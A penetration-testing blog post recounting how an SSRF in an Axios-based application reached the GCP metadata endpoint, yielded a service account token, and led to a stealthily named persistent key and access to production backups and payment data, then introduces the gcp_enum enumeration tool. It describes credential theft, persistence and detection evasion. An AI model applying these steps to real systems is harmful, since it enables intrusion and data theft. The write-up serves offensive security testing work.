From a SSRF to the creation of gcp_enum

Escrito por  Bruno Menna

In this article, we will discuss a case of SSRF in a GCP environment and how exploiting this vulnerability led to the idea and creation of the tool gcp_enum.

The tool automates the process of authenticating GCP service accounts and provides a convenient way to list various GCP resources.

Backstory

During a code review, the team found a possible SSRF; the application used the BFF (Backend for fronted) architecture.

 

Backend for Frontend (BFF) is a design pattern where separate backend services are created specifically for each frontend client. This allows developers to tailor backend logic and data retrieval to the needs of each frontend, improving performance and user experience.

The application was built with Axios, and this was the vulnerable snippet.

The “content” parameter was being passed as the body of the request, and it could be supplied by the users. We also knew that the client uses GCP as the cloud provider, so the first idea was to send a request to the internal metadata endpoint.

We sent this request and the response was a 403 error.

After some research, we found that a “Metadata-Flavor” header was required for internal metadata requests.

At this moment we had to find a way also to send this header, or we wouldn’t be able to exploit the SSRF.

Reading the Axios docs we discovered that attaching headers to the requests is possible, and this would solve our problem.

This was the first request that we sent, and we were successful.

From now on, we were able to generate the access token for the service account.

The only problem was that this token was short-lived. We could use it for 1h, but each time, we had to generate it again and share it with the team.

Considering this, we created an access key for the Service Account, simplifying authentication via the GCP CLI. We carefully selected a non-suspicious name, “argo cd,” in line with company naming conventions to avoid detection. This name, associated with Kubernetes deployment, is generally avoided due to the risk of errors.

After creating the key, we paused for a few hours before using it. Now, after authenticating using the key file, we could use the `gcloud` and `gsutil` commands directly. So we listed the buckets using `gcloud storage ls`, and we got access to many sensitive files, even production backup files and payment information.

We started to test access for other resources, but it was all manual, for each resource we had to send a request.

That’s when the idea of creating a tool to automate this process came to life.

GCP_ENUM

Usage

To authenticate GCP service accounts and test resource access, there are two methods:

  1. Using a key file
  2. Listing the already logged accounts and choosing one to test

To use the JSON key file, this will be the command:

python3 gcp_enum.py -f <path_to_json_key_file> -o <output_file>

To list the logged accounts select one to see the resource access:

python3 gcp_enum.py -l

If you have logged accounts, you need to copy the e-mail address and paste into the command:

python3 gcp_enum.py -s <service_account_email> -o <output_file>

You will have an overview of the permissions the account has. If you would like to see more details, you can check the output file.

It will contain the output of the services that you have access to.

Also the tool is modular, if there’s any test missing you can add by just passing the name and the command.

Example snippet from the code:


resource_commands = {
"AI Platform Jobs": "gcloud ai-platform jobs list",
"AI Platform Models": "gcloud ai-platform models list",
"BigQuery": "bq ls",
"Cloud Bigtable Instances": "gcloud bigtable instances list",
"Cloud Filestore Instances": "gcloud filestore instances list",
"Cloud Functions": "gcloud functions list",

Conclusion

Conclusion

The exploration of a Server-Side Request Forgery (SSRF) vulnerability within a Google Cloud Platform (GCP) setting led to the development of, a tool streamlining GCP service account authentication and resource listing. Born from the need to automate repetitive manual testing and token management. It offers a modular and efficient approach to understanding service account permissions and the landscape of accessible GCP resources.

The link to the tool is: https://github.com/hakaioffsec/gcp_enum.

Logo da Hakai.